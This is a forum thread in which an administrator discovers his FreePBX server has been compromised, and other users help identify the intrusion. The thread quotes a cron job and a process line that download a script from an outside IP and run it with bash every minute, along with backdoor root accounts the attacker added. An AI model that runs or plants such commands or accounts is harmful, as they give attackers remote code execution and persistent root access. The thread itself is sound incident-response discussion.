byrnejb
(James B. Byrne)
May 3, 2022, 4:04pm
1
I am doing some work relating to a new gateway router and perimeter firewall. While checking https connectivity from outside I happened to discover this using netstat:
# netstat -an | grep 80
tcp 0 0 192.168.6.9:41780 0.0.0.0:* LISTEN
tcp 0 1 192.168.6.9:42528 37.49.230.74:80 SYN_SENT
tcp 0 1 192.168.6.9:42522 37.49.230.74:80 SYN_SENT
tcp 0 1 192.168.6.9:42526 37.49.230.74:80 SYN_SENT
. . .
My question: What is freebsd doing connecting to that address?
Stewart1
(Stewart)
May 3, 2022, 4:10pm
2
That is malicious traffic specific to FreePBX – your machine has already been compromised.
Had your firewall not blocked it, the script would have retrieved more malicious code.
byrnejb
(James B. Byrne)
May 3, 2022, 4:20pm
3
So I see this:
root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Which is likely the compromise script running. How do I tell where is is running from?
byrnejb
(James B. Byrne)
May 3, 2022, 4:22pm
4
That is interesting. I see this in cron:
*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Your system is compromised, as @Stewart1 already said. Your best bet is to wipe and start over. You can attempt to cleanup but you are assuming that you are smarter/more determined than the bad guys.
1 Like
Stewart1
(Stewart)
May 3, 2022, 4:25pm
6
This thread may be useful:
If you were impacted by the restapps security regression a week or two ago, it is possible you were hit with a php script that is currently labeled “k.php” If you want to see if you were compromised by this script, I’ve included some content below that you can check. I do not claim to have identified everything, but I’m hoping this might help someone.
Anyways, here are the places you can look.
crontab -e -u root → if this line exists, you’re compromised. DO NOT run this for testing.
*/1 * …
but I strongly agree with @adell4444 – start over.
1 Like
byrnejb
(James B. Byrne)
May 3, 2022, 4:26pm
7
Which of these are used by FreePBX?
root:x:0:0:root:/root:/bin/bash
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
Yes, I see the need to get this fixed with a scrub. But not in the middle of a workday.
sugarmaint supports and supermaint are all known to have been maliciously added. Take a read through the thread that was attached.
1 Like
system
(system)
Closed
June 2, 2022, 5:03pm
9
This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.